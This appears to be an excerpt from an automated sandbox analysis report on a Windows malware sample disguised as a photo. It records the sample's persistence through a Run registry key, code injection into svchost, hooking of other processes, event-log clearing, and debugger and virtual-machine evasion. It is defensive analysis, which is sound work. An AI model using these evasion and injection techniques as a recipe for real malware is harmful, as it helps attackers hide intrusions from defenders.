                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004236D3 LoadLibraryW,GetProcAddress,_memset,DefWindowProcW,LoadCursorW,RegisterClassExW,0_2_004236D3
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .ubx1
                      Source: 8VhJ2Jq.exe.0.drStatic PE information: section name: .00cfg
                      Source: 8VhJ2Jq.exe.0.drStatic PE information: section name: .ubx0
                      Source: 8VhJ2Jq.exe.0.drStatic PE information: section name: .ubx1
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0049384F push ecx; ret 0_2_00493862
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00496F95 push ecx; ret 0_2_00496FA8
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_02483A9A push ecx; ret 0_2_02483AAD
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0247EC99 push ecx; ret 0_2_0247ECAC
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_10013A96 push ecx; ret 0_2_10013AA9
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_1000EC95 push ecx; ret 0_2_1000ECA8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032D9EC5 push ecx; ret 4_2_032D9ED8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ED2F35 push ecx; ret 4_2_03ED2F48
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ECCD01 push ecx; ret 4_2_03ECCD14
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EE24A0 push ebp; retf 4_2_03EE24A4
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EE2484 push ebp; retf 4_2_03EE24A4
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EE246C push ebp; retf 4_2_03EE24A4
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EE2430 push ebp; retf 4_2_03EE24A4
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3D7865 push ecx; ret 4_2_6C3D7878
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3F73A8 push ecx; ret 4_2_6C3F7398
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3F7399 push ecx; ret 4_2_6C3F7398
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03039892 push ecx; ret 4_2_030398A5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3D7865 push ecx; ret 5_2_6C3D7878
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3F73A8 push ecx; ret 5_2_6C3F7398
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3F7399 push ecx; ret 5_2_6C3F7398
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile created: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeJump to dropped file
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile created: C:\Program Files (x86)\EjXjKxze\VCRUNTIME140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile created: C:\Program Files (x86)\EjXjKxze\MSVCP140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile created: C:\Program Files (x86)\EjXjKxze\libcef.dllJump to dropped file
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0040638A _memset,_wcslen,_wcslen,GetPrivateProfileStringW,PathFileExistsW,_wcslen,RegOpenKeyExW,_memset,_wcslen,RegQueryValueExW,_wcslen,_wcslen,PathAppendW,PathFileExistsW,_wcslen,_wcslen,RegCloseKey,_wcslen,GetPrivateProfileStringW,PathFileExistsW,_wcslen,RegOpenKeyExW,_memset,_wcslen,RegQueryValueExW,_wcslen,_wcslen,PathFileExistsW,PathFileExistsW,PathAppendW,PathFileExistsW,_wcslen,RegCloseKey,0_2_0040638A
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0040F9CE __EH_prolog3_GS,_memset,GetPrivateProfileStringW,std::exception::exception,__CxxThrowException@8,0_2_0040F9CE
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004029BD __EH_prolog3_GS,_memset,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetCurrentThreadId,SetTimer,0_2_004029BD
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00403B0D GetSystemMenu,EnableMenuItem,GetCurrentProcessId,_wcslen,_memset,GetPrivateProfileStringW,GetPrivateProfileStringW,SetTimer,_wcslen,0_2_00403B0D
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00410B80 _memset,GetPrivateProfileStringW,GetPrivateProfileStringW,_wcslen,GetPrivateProfileStringW,_wcslen,GetPrivateProfileStringW,GetPrivateProfileStringW,_wcslen,GetPrivateProfileStringW,_wcslen,GetPrivateProfileStringW,_wcslen,GetPrivateProfileStringW,GetPrivateProfileStringW,_wcslen,GetPrivateProfileStringW,_wcslen,GetPrivateProfileStringW,_wcslen,0_2_00410B80
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00407C07 KillTimer,_wcslen,_wcslen,_memset,GetPrivateProfileStringW,_wcslen,0_2_00407C07
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWSJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWSJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 1492 base: 2F40005 value: E9 8B 2F FB 73 Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 1492 base: 76EF2F90 value: E9 7A D0 04 8C Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 1492 base: 2F50007 value: E9 EB DF FD 73 Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 1492 base: 76F2DFF0 value: E9 1E 20 02 8C Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 4396 base: 1350005 value: E9 8B 2F BA 75 Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 4396 base: 76EF2F90 value: E9 7A D0 45 8A Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 4396 base: 1360007 value: E9 EB DF BC 75 Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 4396 base: 76F2DFF0 value: E9 1E 20 43 8A Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 1576 base: 2E00005 value: E9 8B 2F 0F 74 Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 1576 base: 76EF2F90 value: E9 7A D0 F0 8B Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 1576 base: 2E10007 value: E9 EB DF 11 74 Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeMemory written: PID: 1576 base: 76F2DFF0 value: E9 1E 20 EE 8B Jump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0041144B IsIconic,0_2_0041144B
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004118A5 IsIconic,GetWindowRect,OffsetRect,CreateRoundRectRgn,SetWindowRgn,DeleteObject,0_2_004118A5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EC6080 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,4_2_03EC6080
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 d33f351a4aeea5e608853d1a56661059Jump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 8VhJ2Jq.exe, 00000004.00000002.3912213161.00000000008B4000.00000020.00000001.01000000.00000005.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3391847157.00000000008B4000.00000020.00000001.01000000.00000005.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3470772625.00000000008B4000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: SBIEDLL.DLL
                      Tries to detect virtualization through RDTSC time measurements
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeRDTSC instruction interceptor: First address: BC92C8 second address: BC92CF instructions: 0x00000000 rdtsc 0x00000002 xor cl, FFFFFF9Ah 0x00000005 mov eax, ebp 0x00000007 rdtsc
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeRDTSC instruction interceptor: First address: BF0B47 second address: 102AF4A instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 movzx eax, di 0x00000006 pop eax 0x00000007 cwd 0x00000009 jmp 00007FC8D93E61A7h 0x0000000e pop esi 0x0000000f movzx edx, cx 0x00000012 jmp 00007FC8D91943E8h 0x00000017 pop ebx 0x00000018 xchg dh, dl 0x0000001a movsx edx, di 0x0000001d pop edx 0x0000001e jmp 00007FC8D923D59Ah 0x00000023 ret 0x00000024 popfd 0x00000025 rdtsc
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeRDTSC instruction interceptor: First address: 9BEAAF second address: 9BEAB3 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 pop edi 0x00000004 rdtsc
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeRDTSC instruction interceptor: First address: 9BEAB3 second address: 8F4D48 instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 3E4A5909h 0x00000007 pop ebp 0x00000008 xchg bh, bl 0x0000000a jmp 00007FC8D91E226Ah 0x0000000f pop ebx 0x00000010 rdtsc
                      Tries to evade analysis by execution special instruction (VM detection)
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSpecial instruction interceptor: First address: 102AF4A instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004494D0 GetCurrentProcessId,_wcslen,_wcslen,CreateToolhelp32Snapshot,GetLastError,_memset,Process32FirstW,OpenProcess,GetModuleFileNameExW,__wcsnicmp,CloseHandle,Process32NextW,GetLastError,CloseHandle,0_2_004494D0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeWindow / User API: threadDelayed 3149Jump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeDropped PE file which has not been started: C:\Program Files (x86)\EjXjKxze\VCRUNTIME140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeDropped PE file which has not been started: C:\Program Files (x86)\EjXjKxze\MSVCP140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-52872
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-53310
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeAPI coverage: 4.3 %
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeAPI coverage: 1.0 %
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe TID: 7304Thread sleep time: -93000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe TID: 3812Thread sleep time: -31490s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeLast function: Thread delayed
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeThread sleep count: Count: 3149 delay: -10Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C37270F GetLocalTime followed by cmp: cmp eax, 0ch and CTI: jle 6C372771h4_2_6C37270F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C37270F GetLocalTime followed by cmp: cmp eax, 0ch and CTI: jle 6C372771h5_2_6C37270F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0044BCC0 __fseeki64,__ftelli64,FindFirstFileW,FindClose,0_2_0044BCC0
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00407096 __EH_prolog3_GS,_memset,GetLogicalDriveStringsW,PathAppendW,_memset,GetDriveTypeW,PathAppendW,PathAppendW,_wcslen,0_2_00407096
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0044A020 GetSystemInfo,GetVersionExW,0_2_0044A020
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\COMCTL32.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984Jump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\SysWOW64\KERNELBASE.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_d94bc80de1097097Jump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_d94bc80de1097097\gdiplus.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\SysWOW64\KERNEL32.DLLJump to behavior
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3288456452.0000000000828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3288456452.0000000000828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\.
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3288456452.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, photo_2024-09-18_20-00-20.exe, 00000000.00000002.3288456452.0000000000828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 8VhJ2Jq.exe, 00000004.00000002.3913008568.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeAPI call chain: ExitProcess graph end nodegraph_0-53312
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeAPI call chain: ExitProcess graph end nodegraph_0-53982
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Found API chain indicative of debugger detection
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-52900
                      Hides threads from debuggers
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeSystem information queried: KernelDebuggerInformationJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0049543B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0049543B
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004494D0 GetCurrentProcessId,_wcslen,_wcslen,CreateToolhelp32Snapshot,GetLastError,_memset,Process32FirstW,OpenProcess,GetModuleFileNameExW,__wcsnicmp,CloseHandle,Process32NextW,GetLastError,CloseHandle,0_2_004494D0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ECBC4A VirtualProtect ?,-00000001,00000104,?4_2_03ECBC4A
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004236D3 LoadLibraryW,GetProcAddress,_memset,DefWindowProcW,LoadCursorW,RegisterClassExW,0_2_004236D3
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_02470B11 mov eax, dword ptr fs:[00000030h]0_2_02470B11
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_02FA05B8 mov eax, dword ptr fs:[00000030h]4_2_02FA05B8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_02FA026D mov eax, dword ptr fs:[00000030h]4_2_02FA026D
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_030300DB mov eax, dword ptr fs:[00000030h]4_2_030300DB
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004600A0 GetAdaptersAddresses,GetAdaptersAddresses,GetProcessHeap,GetProcessHeap,HeapAlloc,GetAdaptersAddresses,__snwprintf,GetProcessHeap,HeapFree,0_2_004600A0
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0049543B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0049543B
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00489DC1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00489DC1
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0247D3EA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0247D3EA
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0247A505 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0247A505
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_1000D3E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000D3E6
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_1000A501 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000A501
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032D8697 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_032D8697
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032D6925 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_032D6925
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EC8AA0 Sleep,CloseHandle,CloseHandle,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,4_2_03EC8AA0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ED0B07 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_03ED0B07
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ECA49B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_03ECA49B
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3D1F6A _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C3D1F6A
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3D6D68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C3D6D68
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3D1F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C3D1F75
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3D6D68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6C3D6D68
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3D1F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6C3D1F75
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3D1F6A _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6C3D1F6A

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Contains functionality to inject code into remote processes
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032D5810 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,4_2_032D5810
                      Contains functionality to inject threads in other processes
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB8CE0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,4_2_03EB8CE0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe4_2_03EB8CE0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe4_2_03EB8CE0
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeProcess created: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe "C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe" Jump to behavior
                      Source: 8VhJ2Jq.exe, 00000004.00000002.3914054252.0000000004134000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                      Source: photo_2024-09-18_20-00-20.exe, photo_2024-09-18_20-00-20.exe, 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, photo_2024-09-18_20-00-20.exe, 00000000.00000002.3289347334.0000000010017000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: photo_2024-09-18_20-00-20.exe, photo_2024-09-18_20-00-20.exe, 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, photo_2024-09-18_20-00-20.exe, 00000000.00000002.3289347334.0000000010017000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SHELL_TrayWnd
